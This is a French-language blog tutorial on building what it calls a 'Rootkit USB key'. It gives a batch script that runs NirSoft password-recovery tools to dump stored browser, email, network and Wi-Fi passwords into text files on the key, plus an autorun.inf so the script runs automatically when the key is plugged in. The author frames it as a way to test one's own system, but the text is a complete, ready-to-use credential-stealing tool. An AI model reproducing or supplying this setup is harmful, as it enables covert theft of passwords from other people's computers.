Aujourd’hui je vais vous montrer comment créer une clé USB Rootkit, si vous ne savez pas ce qu’est un Rootkit je vous invite à voir mon article sur les différents types de malwares. Cette clé USB pourra être utilisée dans le but de tester la résistance de votre système face à cette manière d’obtenir les mots de passes et autres informations.

Nous allons dans un premier temps télécharger quelques outils qui nous permettront de récupérer les mots de passe des applications les plus souvent utilisées.

• MailPV
• Web Browser Password
• Network Password Recovery
• Wireless Key

Une fois tous les dossiers (en .zip) bien téléchargés rassemblez les sur la clé USB.

Extrayez les différentes archives compressées (avec Winrar par exemple)

Gardez uniquement les fichiers exécutables, les autres sont inutiles pour cette manipulation.

Cela est désormais déjà plus clair pour s’y retrouver. Désormais il faut créer un fichier qui exécutera les commandes pour lancer les fichiers exécutables. Pour cela nous créons un nouveau fichier texte, il devra s’appeler ‘launch.txt’.

Il faudra intégrer le code ci-dessous dans le fichier texte.

Code :

    @echo off

    start WebBrowserPassView.exe /stext informations/LesMotsDePassesWEB.txt

    start mailpv.exe /stext informations/LesMails.txt

    start WirelessKeyView.exe /stext informations/LesClesReseaux.txt

    start netpass.exe /stext informations/MotsDePasses.txt

Explication des différentes balises (code en CMDOS) :

Start : Se charge de démarrer le programme dans la racine du dossier

/stext [Dossier]/[NomFichier.txt] : La balise /stext signification l’écriture dans un fichier, ici cela créer le dossier [Dossier] s’il n’est pas déjà créé et dans ce dossier créer un fichier texte qui retourna les différents logs du programme exécutable, permettant de retourner les mots de passes qui ont été trouvés.

Une fois cela fait il faut renommer le fichier texte ‘launch.txt’ en ‘launch.bat’ (si vous ne savez pas comment afficher les extensions des fichiers cliquez ici)

Maintenant il faut que le fichier ‘launch.bat’ puisse se lancer seul lorsque la clé USB est branchée dans un port.

Pour cela nous créons un fichier autorun.inf avec le code suivant :

Code :

    [autorun]

    open=launch.bat

    ACTION=’Le nom de la nouvelle option’

Enfin, il ne reste plus que à sauvegarder et c’est bon, votre clé USB Rootkit est prête à être utilisée !

J’espère que ce tuto vous aura plu. Merci de m’avoir lu, n’hésitez pas à partager et à commenter. Bonne journée/soirée.